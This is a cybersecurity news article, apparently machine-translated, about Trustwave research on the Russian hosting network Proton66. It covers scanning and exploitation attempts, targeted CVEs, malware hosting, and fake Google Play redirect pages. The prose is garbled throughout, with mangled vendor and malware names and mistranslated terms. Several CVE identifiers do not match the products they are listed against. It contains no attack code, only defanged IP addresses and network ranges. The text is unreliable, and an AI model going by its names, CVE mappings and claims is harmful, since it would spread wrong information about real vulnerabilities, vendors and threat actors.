Cybersecurity researchers revealed a splash in “mass scan, accounts and operating attempts” from the IP address Proton66.
Activities, revealed from January 8, 2025, focused organizations worldwide, said in a double analysis published by Trustwave Spiderlabs last week.
“Clean blocks 45.135.232.0/24 and 45.140.17.0/24 were particularly active – noted. “Earlier, several people who violate IP -Drace have not previously participated in harmful activity or were inactive for more than two years.”
Russian Autonomous System Proton66 is evaluated be related to another autonomous system by the Prospero name. Last year, the French Protective Firm Intrinsec spoke in detail about its ties with the services conducted on the scavengers, which are sold in Russian cybercrime forums called Securehost and Bearhost.
Several families of malware, including Gootloader and Spynote, conducted their servers on team and control (C2) and phishing pages on Proton66. Earlier in this February journalist Brian Krebs disclosed This Prospero began routing its activities through the networks conducted by the Russian Casperson’s antivirus seller in Moscow.
However, Kaspersky denied that he was working with Prospero, and that “route through the Caspers -driven networks is not default.
The latest Trustwave analysis showed that malicious requests that occurred from one of the pure Proton66 blocks (193.143.1 (.) 65) in February 2025 tried to use some of the latest critical vulnerabilities –
- Cve-2025-0108 – Vulnerability of Authentication Passage in Palo Alto Networks Pan-OS
- Cve-2024-41713 – Insufficient Vulnerability check -in components Mitel Micollab in Nupoin Unified Messaging (NPM)
- Cve-2014-10914 – vulnerability of teams d-link nas
- Cve-2024-5591 & cve-2015-2472 – Bypass vulnerability of authentication in Fortinet Fortios
It is worth noting that the operation of the two defects of the Fortinet Fortos was associated with the original access broker, dubbed Mora_001, which is observed, which provides a new recovery strain called Superblack.
Cybersecurity firm said it also observed some malware associated with Proton66 Xwormer. Strelastalerand a ransom named Weaxor.
Another notable activity concerns the use of compromised WordPress websites related to the Proton66 IP address “91.212.166 (.) 21” For redirecting Android devices to phising pages that mimic Google Play applications and cheat users in loading from malicious APK files.
Redecution is facilitated by malicious JavaScript located on the IP -Don66. The analysis of the names of domains of fake game shops shows that the company is designed to focus on users of French, Spanish and Greek.
‘Redirection scenarios are designed and conducted several checks against the victim, such as scanners and VPN users or proxies interpret. “The user’s IP is obtained through a request for iPify.org, then the availability of VPN to proxy is verified through the next request to iPinfo.io. Ultimately redirect occurs only when the Android browser is found.”
Also located in one of the IP addresses Proton66 is the ZIP archive, which leads to the deployment of malicious Xworm software, in particular, highlighting users of chat users using Korean chat using social engineering schemes.
The first stage is attack-is Windows (LNK), which performs the PowerShell command, which then launches Visual Basic, which in turn loads Base64, coded .Net Dll from the same IP address. Dll continues to load and download Binary Xworm.
Proton66 related to infrastructure was also used ease The phishing campaign by an e -mail aimed at German users who are with StrelasteAler, an information theft that communicates with the IP -ADRAC (193.143.1 (.) 205) for C2.
And last but not less important, the WEAXOR RANSOMWAR artifacts Mallox – Contact with the C2 server in the Proton66 (“193.143.1 (.) 139” were found.
Organizations are advised to block all routing ranges without domains (CIDR) related to Proton66 and Chang Way Technologies is probably related to the Hong Kong supplier to neutralize potential threats.
